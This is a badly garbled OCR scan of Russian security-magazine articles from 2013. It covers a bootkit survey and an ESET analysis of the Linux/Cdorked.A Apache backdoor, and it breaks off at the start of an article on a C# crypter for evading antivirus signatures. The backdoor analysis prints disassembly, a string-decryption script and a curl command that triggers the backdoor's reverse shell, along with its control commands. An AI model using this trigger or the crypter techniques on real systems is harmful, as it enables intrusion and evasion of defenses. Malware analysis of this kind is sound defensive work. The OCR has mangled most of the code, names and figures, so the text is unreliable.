4-байтового поля Надепт5естог$ Сарт добивается 
того, что код УВВ передает управление не на 1РЕ, 
а на свой код (см. рис. 4). Нечто подобное ис- 
пользовал Мергайх (изменение нескольких байт 
в МВВ для получения управления и затруднения 
своего обнаружения). 

Несмотря на значительную сложность, пока- 
затели скрытности Саррл значительно меньше, чем 
у других представителей класса буткитов, хотя бы 
из-за размещения хранилища внутри файловой 
системы. К тому же количество зараженных Сар7 
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компьютеров в 2012 году исчислялось всего лишь 
сотнями (большинство из них находилось в Рос- 
СИИ). 


ВЕЗДЕСУЩИЕ КИТАЙЦЫ 

Пытаются не отставать в технологической гонке 
и товарищи из Страны восходящего солнца (в 
наш век тотального интереса ко всякому аниме 
очень приятно увидеть человека, который считает 
Страной восходящего солнца Китай :). — Прим. 
ред.). 

Свежий дроппер китайского трояна Сипйог 
(известен с 2010 года), обнаруженный летом 2013 
года сотрудниками компании $Зорпо$, порадовал 
очередным трюком обхода проактивной защиты 
при своей инсталляции в систему. Сам дроппер 
спроектирован и собран таким образом, что мо- 
жет запускаться и как исполняемый файл ЕХЕ, 
и как динамическая библиотека ОИ(. Под именем 
пл$17932.А4! он копируется в каталог %Тетр% 
и выставляет флаг в заголовке файла, указы- 
вающий, что это 0ОШ.. Также в каталог %ЖТетр% 
сохраняется копия файла Нер(хгехе (он им- 
портирует функции из тзито32.а!), который 
отвечает за отображение «Справки и поддерж- 
ки» в \ЛЛпао\м/$. Но это еще не все — для запуска 
НерСгехе переменная окружения РАТН изме- 
нялась так, чтобы каталог %Тетр% располагался 
раньше, чем каталог %Зучет%. Сам НерСх.ех 
вызывался на исполнение путем отправки сооб- 
щения \М/М_ НОТКЕУ окну Пе! ТгуМ/”та (по умол- 
чанию справка вызывается комбинацией <\МИп + 
Е1>). Таким образом, дроппер тзитоа32.а! под- 
гружался легитимным файлом Нер(хг.ехе (метод 
а! прасктоа) и не вызывал срабатывания проак- 
тивной защиты антивирусов. После отработки 
файлы в %Тетр% удалялись, а переменная РАТН 
восстанавливалась к исходному виду. Еще из от- 
личительных особенностей можно отметить на- 
личие обширного списка процессов антивирусов 
и защитного ПО, которые подлежат немедленно- 
му завершению. Буткит-компонент Сипйог создан 
на базе исходных кодов Зюпеа ВоскКИ (в Китае 
вообще любят заимствовать уже работающие 
готовые решения). Механизм сокрытия и само- 
защиты полностью аналогичен Мебгос{ ранних 
версий — перехват!АР_ Му ВЕАВ и!1ВР_МУу М/АПЕ 
в 91$К.$у$. 


СЛИВ ГОДА 
Сафегр. Новости об этом банковском трояне пу- 
бликуются с завидной регулярностью. Весной в 
результате совместной операции Службы без- 
опасности Украины (СБУ) и Федеральной службы 
безопасности России (ФСБ) на территории Укра- 
ины были задержаны распространители и раз- 
работчики Сагфегр. А летом его исходные тексты 
утекли в паблик. Около 5 Гб исходных текстов (2 Гб 
в архиве) оказались доступными для загрузки 
любым желающим. Среди исходников отдель- 
ный интерес представляет код буткита. Сафегр 
изначально не имел своей Боо1Кй-составляющей 
до 2011 года, когда разработчики купили фрейм- 
ворк Воугих. Кроме того, архив содержит часть ис- 
ходных текстов буткитов Этопед и Зтома|. 
Фреймворк Воупх известен с 2011 года, тогда 
он использовался в качестве загрузчика трояна 
Мауаспок (С!дох). Главная особенность Воупх — 
заражение не МВВ, а загрузочного сектора си- 
стемного раздела с файловой системой МТЕ$З, 
также называемого \/оите Воот Весога (\ВН). 
Дроппер Мауаспок несет в себе как 32-битный, 
так и 64-битный драйвер Во\упх. На диске сохра- 
нялся соответствующий драйвер в зависимости 
от разрядности пользовательской ОС. Он мог 
быть записан как в начало диска (до первого ак- 


тивного раздела), если там достаточно места, так 
и в его конец. Анализируя загрузочную запись, 
троянец находил место для своего размещения 
и перезаписывал имеющийся там код. Ориги- 
нальный код упаковывался при помощи библиоте- 
ки аРИБ и дописывался следом. Номер начального 
сектора размещенного на диске драйвера и его 
размер также «прошивался» в тело зараженной 
УВВ. На момент обнаружения Мауаспок сотруд- 
ники антивирусных компаний не знали, что буткит 
был сторонним компонентом и, по всей вероят- 
ности, был куплен. Это установили только после 
обнаружения трояна Сагоегр с аналогичным мо- 
лулем. В начале 2012 года ЕЗЕТ обнаружила мо- 
дификацию Воутх, оснащенную полиморфным 
генератором вредоносного кода, размещаемого 
в \/ВВ, а также реализацией зашифрованного 
при помощи алгоритма ВСб хранилища файлов. 
Любопытно, что в качестве файловой системы ис- 
пользовалась модификация \ЕАТ. 

Воугх стал первым представителем \УВВ- 
буткитов. И, проводя аналогии с ситуацией по- 
сле слива исходников Геи$ (кстати, разработчи- 
ки Сагегр их активно использовали), следует 
ожидать всплеска разработок БоФф-компонентов 
на его основе. 


ЧТОДЕНЬ ГРЯДУЩИЙ НАМ ГОТОВИТ? 
На волне распространения МВВ- и \УВВ-заразы 
все дружно вспомнили про ЧЕН. Единичные слу- 
чаи малвари, модифицирующей ВО$ (Мебгоп" 
В 2011 году), объясняются тем, что производите- 
лей ВО$ большое количество и писать код под 
значительное многообразие прошивок вообще 
не вариант. Другое дело — ЦЕН, где все унифици- 
ровано. С другой стороны, ЦЕН написан на языке 
Си, что подразумевает наличие многочисленных 
ошибок переполнения буфера. Итальянец Андреа 
Алльеви (Апагеа Айем), ведущий исследователь 
компании ПЗЕС в области ИТ-безопасности, 
продемонстрировал в сентябре 2012 года уязви- 
мость механизма загрузки \М/Ипаом/$ 8, разрабо- 
тав первый полноценный ЦЕН-буткит для этой 
платформы. Исследователи 1ТЗЕС нашли уязви- 
мость в ЦЕН и использовали ее для замены ЧЕН 
бооНоааег на свой собственный. В результате 
механизмы защиты Кете! Ра1сп Рищесйоп и Опуег 
Зюпашге Епгсетет успешно обходятся. Вес- 
ной 2013 года на конференции НПВ (Наск т пе 
Вох) Себастьян Качмарек (ЗебазНеп Касхтагек) 
из Онай$Ёаб представил доклад «Огеатбоо!: А 
ОЧЕР Вос\Кй» и продемонстрировал работу оче- 
редного концепта буткита для \Мтаом/$ 8. Исход- 
ники проекта Огеатбос{ доступны на дайпиЬ.сот. 
Следует отметить, что все эти наработ- 
ки функционируют при отключенной функции 
ЗесигеВоот, что позволило компании М!сго5ой 
с новыми силами заняться ее продвижением. 
Однако популярность \\пао\м$ 8 на десктопах 
пока крайне мала, программировать под ЦЕН — 
одно удовольствие (не ассемблер все-таки, 
аСи), а это значит, что у создателей буткитов еще 
есть время не раз и не два попользоваться ре- 
сурсами компьютеров ничего не подозревающих 
граждан, а иной раз и залезть им в карман. По- 
скольку рядовой пользователь сам не в состоя- 
нии отправить подозрительные файлы на анализ 
(хотя бы потому, что к файлам буткитов, как пра- 
вило, из ОС доступ получить нельзя), хочется по- 
желать, чтобы сисадмины корпоративных сетей 
внимательнее относились к мониторингу подо- 
зрительной сетевой активности (на шлюзе проще 
всего отследить, что какая-то гадость стучится 
в интернет), а антивирусные компании более 
оперативно реагировали на появление новых 
угроз такого типа. = 


7) 


ВМЕСТО В10$ 


На смену ВО$ приходит система 
ЦЕН, комплекс спецификаций, 
появившийся как «загрузочная 
инициатива Интел» (1е| Во 
шп{ацуе) в далеком уже 1998 году. 
Инициатива возникла потому, 
что ограничения В!О5, такие 
как 16-битный исполняемый код, 
адресуемая память 1 Мб, от- 
сутствие поддержки загрузочных 
дисков больше 2 Тб и другие, стали 
ощутимо тормозить развитие вы- 
числительных систем. Фактически 
ЧЕН представляет собой некое 
подобие операционной системы. 
В отличие от В!О5, которые пи- 
шутся на азт, ЧЕР! написан на Си. 
Имеется поддержка графических 
режимов работы видеоадаптера, 
драйверов устройств и сетевого 
стека. Предусмотрена поддержка 
загрузчиков ОС и разметки диска 
СЧ РачЦюп ТаЫе (СРТ), что по- 
зволяет отказаться от концепции 
загрузочных секторов и загружать 
ядра ОС средствами ЦЕРН (под- 
держивается в современных Мпих 
и 64-разрядных М/пао\$, начиная 
с За). Ключевая фишка ЧЕН! — 
механизм ЗесигеВооф, осущест- 
вляющий криптографическую про- 
верку загружаемых компонентов 
ОС при помощи ключей цифровой 
подписи, прошиваемых в чипы 
памяти материнских плат. 
ЗесигеВос+{ как раз и нейтра- 
лизует целый класс вредоносов, 
получающих управление до за- 
грузки ОС. В то же время сообще- 
ство Ипих считает, что Мсго$ой 
создает предпосылки к монополии 
загрузки только ОС \ММпао\м$ (хотя 
подкопаться к самой Мсго$ой 
нельзя — что именно шить в ма- 
теринскую плату, определяют 
их производители). На текущий 
момент для сертификации железа 
на совместимость с \М/таом/$ 8 
требуется наличие функции 
отключения ЗесигеВо(]{ на плат- 
формах, отличных от АНМ, а также 
установки своих ключей. Но кто 
знает, как ситуация изменится 
в дальнейшем? В условиях, когда 
ЗесигеВост будет включен по- 
стоянно, а ОЕМ-поставщики будут 
прошивать только ключи М!сго$о0й, 
может возникнуть ситуация, когда 
установить ОС, отличную от \Ип, 
станет невозможно. Впрочем, 
сообщество Мпих может подпи- 
сать свой загрузчик у компании 
М!сго$о8{. Как говорится, пожи- 
вем — увидим. 
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ВСКРЫВАЕМ КРУТОЙ 
БЭКДОР ПОД МОХ 


Нпих/СаогКед.А — серьезная угроза для серверов 


Пока обыватели клеймят позором винду, АдоБе и ОгасЕе, специалисты отмечают уве- 
личение вредоносных программ, предназначенных для компьютеров под управлени- 
ем Ипих. В первую очередь злоумышленников интересуют веб-серверы. Как и поче- 
му они создают серверную малварь, ты узнаешь из этой статьи. 


У 


Антон Черепанов, 
Мамаге Везеагспег, 
ЕЗЕТ 


ЗАЧЕМ ЗАРАЖАЮТ ВЕБ-СЕРВЕРЫ? 

Прежде чем углубиться в технические дебри, нужно разо- 
браться, а зачем вообще злоумышленникам заражать веб- 
сервер. В большинстве своем веб-серверы заражают, чтобы 
перенаправлять посетителей сайта на связку с эксплойтами. 
В самых простых случаях изменяют веб-контент на скомпро- 
метированном сервере, к примеру в одну из страниц сайта 
добавляют вредоносный код. Данный подход имеет ряд не- 
достатков для злоумышленников. Во-первых, модификацию 
веб-контента на сервере легко обнаружить, к тому же для этих 
целей существуют специальные инструменты. Во-вторых, 
сервер начинает раздавать измененный контент всем посети- 
телям сайта без какой-либо фильтрации, в том числе различ- 
ным конторам, которые могут отметить сайт как вредоносный. 
Злоумышленники хотят оставаться незамеченными как можно 
дольше, именно поэтому начала появляться новая хитроумная 
малварь под ОС Ипих. 


ЫМОХ/СООВКЕО.А 
Впервые это вредоносное ПО обнаружили и исследовали 
специалисты ЕЗЕТ совместно с компанией Зисий в апре- 


ле 2013 года. Первоначально были обнаружены вредонос- 
ные веб-серверы на базе Араспе, позднее выявлены случаи 
компрометации серверов на базе Пара и патх. Основное 
предназначение ИШпих/Саогкеа.А — перенаправлять трафик 
на вредоносные сайты. Так, один из обнаруженных серверов 
перенаправлял пользователей на широко известный набор экс- 
плойтов Васкпо. 

Чпих/Саогкеа.А представляет собой бинарный ЕЕ -файл 
веб-сервера, однако помимо обычной функциональности 
в него добавлена функциональность бэкдора. Злоумышлен- 
ники подменяют легальный бинарный файл на файл с бэк- 
дором. В большинстве случаев для того, чтобы перезапи- 
сать бинарный файл веб-сервера, необходимы гоо{-права, 
но способ проникновения на сервер и метод получения 
год{-доступа злоумышленниками нам пока точно неизве- 
стен. Возможно, для каждого сервера использовалась своя 
тактика, была ли это брешь в сРапе! или же обычная компро- 
метация логина и пароля — сказать трудно. 

Достоверно известно, что Мпих/Саогкечд.А не имеет ме- 
ханизмов самораспространения, а также не использует уяз- 
вимости в серверном ПО. 


ХАКЕР 09 /176/ 2013 


Вскрываем крутой бэкдор под Шпих 


^ |.СехЕ: 0009000000430 9ВВ аа [ибр+чак_38], ках а99 [иБр+уаг_38], ках 

° |.ЕехЕ:0000000000#30 6ВЕ 1еа ках, [иБр+оак_2148] 1еа ках, [иБр+оак_2146] 

^ |.ЕехЕ: 9900009909090430 066 поу г51, ках поз г51, ках 

^ |.Еехе:090000000004300С9 поу ет, #4 поу ет, # ; &5ии1= 
^ |.СехЕ: 0000000000430 9СЕ са11 Ческур® 51/1105 са11 дескурЕ 5171195 

^ | .Еехе 0000900000430 903 поу [гБр+уак_68], ках поу [гбр+уак_68], ках 

^ |.ЕехЕ: 0000000000430 007 Теа ках, [иБр+уак_2159] Теа ках, [гор+уак_2158] 

^ |. ЕехЕ: 90900090090430 60Е поу г51, ках поу г51, ках 

^ |. СехЕ: 0000000000430 0Е1 поу е01, 5 поу е01, 5 ; &5роке= 
7 |. ЕехЕ:09000000000430 9Еб са11 дескурЕ 5171195 са11 дескурЕ 5171195 

^ | .Еехе 0000000000430 ЕВ поу [гБр+уак_68], ках поу [гБр+уак_68], ках 

^ |. СехЕ : 9900090000000430 9ЕЕ Теа ках, [иБр+уак_ 2138] Теа ках, [гор+уак_21386] 

^ |.ЕехЕ: 90990099000430 Её поу г51, ках поу г51, ках 

^ |.СехЕ: 9000000000430 0929 поу е91, в18 поу е91, В1П ; &вие1= 
^ |.ЕехЕ: 9909000060 нЗр ЕЕ са11 дескурЕ 5171195 са11 дескурЕ 5171195 

^ | .ЕехЕ:09000000005301 03 поу ["Бр+чак_68], ках поч [гБр+чак_68], гах 

^ | .Еехе:0000000000430107 1еа ках, [иБр+чаг_2168] 1еа ках, [ибр+уаг_2168] 

^ |. ЕехЕ:009090090004301 9Е поч г51, ках поу г51, гах 

^ |. ЕехЕ:00909000000430111 поу е41, 238 поу е91, 231 ; &Кеу= 
^ |.ЕехЕ:09000000000430116 са11 Ческур{ 5171195 са11 дескурЕ 5171195 

^ |.ЕехЕ:000000000043011В поу ["Бр+оак_68], ках поч [гБр+чак_68], гах 

^ |. ЕехЕ: 9000000000053 011Е поу ках, [иБр+оак_ 6298] поз ках, [иор+чак_6288] 

^ |.СехЕ:0000000000430126 поу гах, [ках+9Е ОП] поу ках, [ках+9Р ОП] 

^ |.ЕехЕ:0000000000430120 1еа 51, а/зегйдепе ; "Шзег-йдепе" Теа г51, аЦ/5егйдепе ; "Шзег-йдепе“" 
^ |. ЕехЕ:0900990909090904301345 поу гд1, ках поу г01, ках 

^ |.ЕехЕ:09000000000430137 са11 _арг_ФаБ1е_дее са11 _арк_Фаб1е_дее 

^ |.ЕехЕ: 909090909009043013С поу ках, ках поу ках, гах 

^ |.СехЕ: 0900000000053 013Е поу ках, [иор+чак_ 6298] поз ках, [иор+чак_6288] 

^ |. 2ехЕ:0000000000430146 поч ках, [ках] поч гах, [ках] 

^ |.ЕехЕ: 09990909090530149 поч г51, КОХ поу 51, ках 

^ |. ЕехЕ: 9090990009090043014С поч гд1, ках поу г01, ках 

^ |. СехЕ: 9000000000053 014Е са11 _арк_р5Еедир са11 _арк_р5Еедир 

^ | .Еехе:0000000000430153 поу [гБр+уан_58], ках поу [гбр+уак_58], ках 

^ |.СехЕ:0000000000430158 поу ках, [иор+оак_ 6298] поз ках, [иор+чак_6288] 

^ |. СехЕ:0900000000043015Е 1еа ках, [иор+оак_2198] 1еа ках, [иор+чак_21986] 

^ |.ЕехЕ:099909090990530166 поч г51, КОХ поу 51, ках 

^ |.ЕехЕ:909909090090430169 поч г01, ках поу г01, ках 

АНАЛИЗ ог 1 1п гапее( $17е): 


Мы будем исследовать 64-битный бинарный ЕЁ -файл от веб- 
сервера Араспе. В файле присутствуют отладочные символы, 
что несколько облегчает задачу исследования. Правда, не- 
намного, так как функции, которые непосредственно при- 
надлежат бэкдору, носят несодержательные имена вроде 
0687ЕЗ 74а0 4484788544955. 

Первое, что придется побороть, — это шифрованные 
строки. Видимо, авторы решили скрыть подозрительные 
строки от любопытных глаз. К счастью, шифр не такой слож- 
ный, всего лишь ХОВ-операция с ключом-константой. С ним 
легко справится такой мощный инструмент, как РАРУПоп. 
Вот такой скрипт мы сделали для его расшифровки: 


# -*- соа1пя: ср1251 -*- 
+гом 14аар1 1троге * 


60 = ВуЕе(оЕЕзеЕ + 1) ^ Кеу[1 % 1еп(Кеу)] 


$г1п5[1 ] 


= 69 & 9хЕЕ 


гефигп $%г (517118) 


деф та1п(): 


# По адресам 9х043зВЗЕЕ-@х43ЗВСЕ@ идет 


# перечисление указателей на зашифрованные 


# строки 


сое _о++$е* = 


90х04ЗВЗЕЕ 


# По данному адресу хранятся длины строк 


х]1еп = 90х768В480 


5${и118$ = [] 


# Запускаем цикл, работающий до первой строки 


# с нулевой длиной 


ий11е(Ву*е (х1еп)): 


фгом 14аи%11$ 1трог{ * 


аеф адесгур*_5%г(оР5еф, $17е): 


# Ищем инструкцию вида 


# «1еа гах, оЁР5еф $&г1пвё» 


ий11е (беЕМпет(со4е_оР5е*) != '1еа’ ог 


# Данный ключ «вшит» в программу 
Кеу = (90х27, 0хАд, 0хЕ?2, @хоА, 9хоА, @хЕ1, 
90х83, 0хв5, @х1Е, 09х30, 9хА7, 9хЕб, @хСс9, 


бетОрТуре (соде_оР5еф, 0) != 14аар1.о_гев ог 


бееОрТуре (со4е_о{Рзеф, 1) != 14аар1..о_ тет): 


соде_о+Р5е{ = Мех{Неад( соде_о++5ет) 


9хЕб, 90х23, 0х9С, 9хоЕ, 0х8, 9хА2, 0хЕЗ, ОХА, 
90х60, 9хЕ@, 9х5) 
${г1п8 = Буфеаггау( $17е) 


# Найденный адрес и длину строки 


# передаем для расшифровки 


5{Г = аесгур*_5Ег (бе Орегапа\а1ие« 


.ТехЕ : 9000000600 нЗЕ2В1 
7 |. ЕехЕ:000000000053Е2В1 ри5В гБр 
^ | .ЕехЕ:000000000053Е2В2 поу гор, г5р 
^ | .ЕехЕ:0900000000053Е?В5 ри5П г12 
^ |. СехЕ:0900000000053Е2В7 ри5П Ех 
^ |. ЕехЕ:000000000053Е2В8 5и6 г5р, 11800 
^ |.ЕехЕ:00000000005ЗЕ2ВЕ поу [иБр+уаг_1178], ка1 
^ |.ЕехЕ:000000000053Е2Сб 1еа ках, [иБр+5{к_Рау1соп] 
^ |. ЕехЕ:0090000000053Е2С0 поу 51, ках 
^ |.ЕехЕ:000000000053Е?200 поу е41, 3 ; /Еаутсоп.-150 
7 |.ЕехЕ:900000000043Е205 са11 дескурЕ_ 571195 
^ |.ЕехЕ: 990000000043Е2БЯ поу [ибр+уак_88], ках 
^ |. ЕехЕ:0090006080053Е2Е1 поу ках, [иор+оак_ 1178] 
^ |. ЕехЕ: 0000068000053 Е2ЕЗ поу кдх, [гах+2300] ЕТ ” 
^ | .ЕехЕ: 00000000005 3Е2ЕЕ 1еа ках, [иБр+5Ек_Рау1соп] ад. 
^ |.ЕехЕ:000000000043Е?Е б поу г51, ках ; гедчезфед ИВ 
^ | .ЕехЕ:09000000000053Е?ЕЗ поу гд1, ках ; /рачтсоп .150 
^ |. ЕехЕ : 99 90000000НЗЕ2ЕС са11 _5&гспр 
^ |. ЕехЕ:000000000043ЕЗ 91 те5Е еах, еах 
^ | .ЕехЕ:0000000090043ЕЗ 03 т2 10с_в3Е5 09 
^ | .ЕехЕ:0000000090043ЕЗ 69 поу гах, [иБр+оак_1178] 
7 |.ЕехЕ:0990000000043ЕЗ1 9 поу ках, [гах+2381] 
^ |.ЕехЕ:000000000043ЕЗ1 7 Те5Е ках, ках 
7 |.ЕехЕ: 990000000043ЕЗ1Я 32 10с_НЗЕВЗЕ 
^ |.ЕехЕ:09900000900043ЕЗ2 0 поу ках, [иБр+уак_1178] 
^ |.ЕехЕ:090000000043ЕЗ27 1еа ках, [иБр+5Ек_1р] 
^ |.ЕехЕ:000000000053ЕЗ2Е поу 51, ках 
^ |.ЕехЕ:000000000043ЕЗ31 поу г01, ках 
^ |.ЕехЕ:000000000053ЕЗЗ 4 са11 спеск_Х_Пеадег5 
^ |.ехЕ:000000000043ЕЗ339 1еа ках, [иБр+5к_1р] 
^ |.ЕехЕ:000000000053ЕЗ В поу г01, ках 
^ |.ЕехЕ: 9000000000053ЕЗЯЗ са11 сопуег{_То_9иога 
^ |.ЕехЕ: 900000000053ЕЗ #8 поу ["Бр+1р_#кот_пеаден], еах 
^ | .ЕехЕ: 9000000000053 ЕЗАВ поу е01, 2000 ; 512е 
^ | .ЕехЕ:000000000043ЕЗ50 са11 —па110с еп г» 
7 |.ЕехЕ:000000000053ЕЗ55 поу [иБр+рек], ках 
^ |. ЕехЕ:000000000053ЕЗ59 поу ках, [иор+оак_1178] 
7 |. ЕехЕ:000000000053ЕЗ6 8 поу ках, [гах+2381] 
^ |.ехЕ:0900000000043ЕЗ367 поу едх, [иБр+1р_+кот_Пеадек] 
^ |. ЕехЕ:0900000000053ЕЗ6 Я поу ксх, [ибр+рег] 
^ | .ЕехЕ:000000000053ЕЗ6Е поу 51, исх ё 
^ | .ЕехЕ:000000000043ЕЗ371 поу г01, ках т 
^ |.ЕехЕ : 99000000 НЗЕЗТ Я са11 хог_епскур Топ 


Обработка запроса для создания подключениягеуег$е Вей 


$ сигЕ -—д "" —Н "Х-Веа1-ТР: 2 3.2 
68.56. 101:8080/ 
НТТР/1.1 392 Роиупа 
бате: Тпи, 25 Арг 2013 13:37:40 СМТ 
бегуег: АрасНе/2.2.23 (Уп1х) 
Госа*1оп: Ар: //доос\е. сот/ 


8" 


107 


Так меняется код после 
выполнения скрипта 
для расшифровки 


строк: раз4ебт.сот/ 
2МНО7га! 


-Н "Соок1ле: 5ЕСТО=" -5 -1 ВТр://192.1 


'7$(руфВоп —с "рг1пе "5Т" .епсоде("Вех")') 


666558-314-ее9е; 09-0-8-7-0-0-0-0-0-1-60-6-0—09 


Соптепт—Цепоей: 282 
Соптепт-Туре: техе/птт1; сВаг5е{=150-8859-1 


Пример обработки одной изкоманд бэкдором 


<!БОСТУРЕ НТМЫ РОВЕТС "-//ТЕТРЕ//ОТО НТМЫ 2.6//ЕМ"> 
<Птт1><Пеад> 

<{1{1е>302 Роипд</{11е> 
</пеад><Боду> 
<п1>Роипа</П1> 

<р>Тбе доситепф Ваз тоуед <а Пгет=" Тр: //доод1е. сот/">Пеге</а>.</р> 


<а4дге$5>АрасНе/2.2.23 (Шп1х) 5егуег ат 192.168.56.191 Роге 8080</аддге$$> 
</Боду></т> 


то$ Ма!игаге 
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_ |.ЕехЕ : бОбб0000б0нЗяЕ2 4 ру$й иор 
_ |.СехЕ: 9090090000004 ЗАЕ25 поч иор, гр 
” |.Еехе:0000000000531Е28 Зи кр, 200 
” |.ЕехЕ: 9000900000004 ЗЯЕ2С поч [гЫр+чакг 1%], ед1 
. |-СехЕ: ООбОббОвебУЗАЕ2Е ый оречаг. 1» 1 Самый быстрый способ узнать, заражен ли серве 
* |.ЕехЕ: 0000000000531 Е36 поу ках, с5:ар_5Вт_а@9г_рег В О О ыы 
° |.ЕехЕ: 00000000005ЗЯЕЗО поч ках, [ках] О 
мы е ы в браузере ПЦр://зегуиег.ги/Рамсоп.1зо. В случае 
- Сехе: 0006000000434 0 Сет гах, гах редиректа на гугл вероятность заражения сервера 
” |.ЕехЕ: 9090000000005 зяЕ АЗ ] 12 10с_838075 очень высока. 
` |.Сехе: 00000000004 ЗЯЕ 49 поу едх ‚ 6660 Для того чтобы достоверно определить факт 
_ |.СехЕ: Об 0004ЗАЕАЕ поу е51, СООВКЕОВ $НМ $12 заражения сервера, рекомендуется использовать 
” |.ЕехЕ: 0000000000532 53 поу е01, 63599 дебзиг$ для систем Эешап и Убипц, а также 
” |.ЕехЕ: 9000900009043 1Е58 са11 _5итдее команду «грт —мейКу» для ВРМ-Базед Шпих систем. 
_ |.Еехе : 9900000004 ЗяЕ5О поч РЧх, с5:ар_5Пт19 реке Ия команды проверяют целостность модулей 
” |. ЕехеЕ: 9009009090900. 3АЕбЗ поч рах еах веб-сервера. Также можно использовать инстру- 
* |.ЕехЕ : 900000б0бонзяЕ66 поу ы м г :ар_$Пт14 рек мент дампа зПагед тетогу, чтобы обнаружить при- 
” |.ЕехЕ: 00000000004 ЗЯЕ6бО поч еах, [ках] ЕКО 
Доступ крегиону (соае_о{Р5е*, 1), ВуЕе(х1еп)) -4, 04. — добавить/удалить Чзег-Адеп{ для черного списка; 
зВаге тетогу $Ег1п55 . аррепа ($%г) -6, Об — добавить/удалить !Р-адреса для черного списка; 
вбэкдоре соде_о++5е{ = Мех{Неаа (со4е_о+{+5е{) .7, 07 — добавить страницы в список исключенных или уда- 


| х]еп += 1 
# Теперь у нас есть все строки, 
# нам нужно найти места, где они используются 
Фипс = ГосВуМате ( 'аесгур*_$5%г1п85') 
# Перебираем все вызовы 
ог аЧаг 1п Содекеф$То(+ипс, Тгие): 
# Ищем инструкцию вида «тоу е@1, ТБ», 
# где ТО будет номером нашей строки 
имй11е (беЕМпет(а4аг) != 'тоу' ог 
беторТуре(а4аг, 09) != 14аар1.о_гев ог 
бе{ЕОрегапа\а1ие (а4аг, 9) != 7): 
аааг = РгеуНеаа( аааг) 
# В комментарий пишем расшифрованную 
# строку 
МакКеСотт ( а44г, $ЕгГ1п85+«= 
[бееОрегапа\а1ие (адаг, 1)]) 


1+ _ пате__ == '_ ма1и__': 
та1и() 


УСТРОЙСТВО И УПРАВЛЕНИЕ 

По результатам вскрытия мы установили, что бэкдором можно 
управлять двумя методами. Первый метод — это геуегзе Пей, 
который активируется, если злоумышленник пошлет СЕТ- 
запрос по НТТР-протоколу со специальным путем. В нашем 
случае этот путь должен быть /Рамсоп.1зо (именно 150, а негсо!). 
В качестве параметров должна быть зашифрованная строка 
«СЕТ_ВАСК;НОЗТ;РОНТ», где НОЗТ и РОВТ — ПР-адрес и порт, 
которые будут использованы для подключения геуегзе зпей. 
Бэкдор использует |Р-адрес из заголовков Х-Рогмагаед-Рог или 
Х-Веа!-!Р для вычисления ХОВ-ключа, который будет использо- 
ван для расшифровки строки параметров. Строка с параметра- 
ми должна быть переведена в Вех-формат. 

Все время, пока шелл используется злоумышленником, 
НТТР-соединение будет активно. Однако бэкдор не записы- 
вает запросы к /Ёа\мсоп.150 в лог-файл работы веб-сервера. 
После того как злоумышленник закончит работу, произой- 
дет редирект на П|р: //дооче.соти/. 

Второй метод позволяет управлять конфигурацией бэк- 
дора. Для этого злоумышленнику необходимо отправить 
РОЗТ-запрос по НТТР-протоколу к специальному ЦВЕ. Пе- 
редаваемый в запросе параметр содержит команду для вы- 
полнения бэкдором, зашифрованную таким же методом, 
как и в случае с геуегзе зпе!. При этом запрос должен со- 
держать Сооке со значением «ЗЕСО=». Для ответа бэкдор 
использует параметр Етад в НТТР-заголовке. 

Бэкдор поддерживает следующие команды: 

1, 01 — добавить/удалить список УВЕ, используемых 

для перенаправления; 

-2, 02 — добавить/удалить диапазоны 1Р-адресов для чер- 

ного списка; 

[3, ОЗ — добавить/удалить Ч$ег-Адет для белого списка; 


лить из него; 

-8, 08 — добавить/удалить диапазоны !Р-адресов для бело- 
го списка; 

[9, 09 — добавить/удалить шаблоны Ассер!-ЁГапдцаде 
для черного списка; 

ГА, ОА — добавить страницы в белый список или удалить 
из него; 

ЭТ — передать статистику работы сервера; 

ОЧ — очистить список |Р-адресов перенаправленных кли- 
ентов; 

Т1 — передать штамп времени. 


Как видно из количества команд, бэкдор имеет доволь- 
но гибкие настройки. Комбинация белых и черных списков 
для различных параметров клиентов дает злоумышленникам 
возможность довольно четко указать критерии посетителей, 
которых нужно перенаправлять на вредоносную страницу. 
Также бэкдор хранит !Р-адреса уже перенаправленных клиен- 
тов вместе со временем перенаправления, для того чтобы из- 
бежать повторного в короткий промежуток времени. 

Интересно, что в процессе работы малварь не создает 
никаких дополнительных файлов, которые бы могли свиде- 
тельствовать о наличии подозрительной активности. Всю 
конфигурацию бэкдор хранит в специальном участке зВагеа 
петогу размером в 6 Мб. Доступ к этому участку имеют все 
дочерние процессы веб-сервера, а также другие процессы 
в системе. Наши специалисты разработали инструмент, по- 
зволяющий сдампить конфигурацию Мпих/Саогкеа.А всех 
вариантов, включая версии для пошх и 19Пра: доо.ч1/5 Е. 

С помощью администраторов одного из зараженных 
серверов, а также с помощью компании $исип нам удалось 
получить дамп региона $зпагеЯ тетогу, в котором хранится 
конфигурация бэкдора. Как видно из конфига, пользова- 
тель перенаправляется, только если он использует |1щете 
Ехр!огег или НигеТох, а также, как ни странно, 1РПопе или Рад. 

Для того чтобы бэкдор перенаправил посетителя веб- 
сайта, в НТТР-запросе должны присутствовать следую- 
щие поля: Ассер-Ёапдчаде, Ассезх-Епсодата, ВеГетег, 
ЧУзег-Адет. Для того чтобы не перенаправлять пользова- 
теля по нескольку раз, бэкдор устанавливает Сооке вида: 
С0!=6745609876567 ; рай=/; ехриез=Епадау, 31-ОШес-2030 
23:59:59 СМТ. Чтобы скрыть свою активность от админи- 
страторов веб-сайта, бэкдор также устанавливает Сооке 
в случае, если параметр НеТтеггег содержит одну из следу- 
ющих комбинаций: *аат*, *мебтазег*, *зибтй*, *$ай, 
*тио”, *мебтт*, *срапе!*, *теть*, *Биск$*, *БИ, *По${*, 
*5есиг», *зирром*. 


ЗАКЛЮЧЕНИЕ 

Мы проанализировали один из сложных и интересных бэкло- 
ров. Итем самым еще раз убедились, что наличие малвари под 
ОС Цпих не миф, а жестокая реальность. = 
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Зашищаемся от сигнатурного сканера методами ХХ] века 


- 


ВСТУПЛЕНИЕ 

Ходит слух, будто некоторые программисты не очень хотят, чтобы сиг- 

натурный анализ продуктов деятельности других кодеров шарил по со- 

кровенным местам их творений. Чтобы их скрыть, они пользуются 
крипторами, которые традиционно написаны на языках более-менее 

низкого уровня. А что, если попробовать сишарп? В конце концов, 2013 

год на дворе! Пусть это будет ргоо{-о{-сопсерт. Без злого умысла! 

Для начала вкратце освежим в памяти теорию. Для этого дадим опре- 
деления тому, с чем мы имеем дело. 

. Маме — машинный код, представитель С++, программа са[С.ехе. 

. МЕТ — общеязыковая среда исполнения СЬВ, представитель С#, 
программа — наш криптор. 

. Криптор — программа для криптозащиты, используемая преимуще- 
ственно для маскировки программного обеспечения. Обеспечивает 
защиту от распространенных антивирусных методов поиска по сиг- 
натурам. 

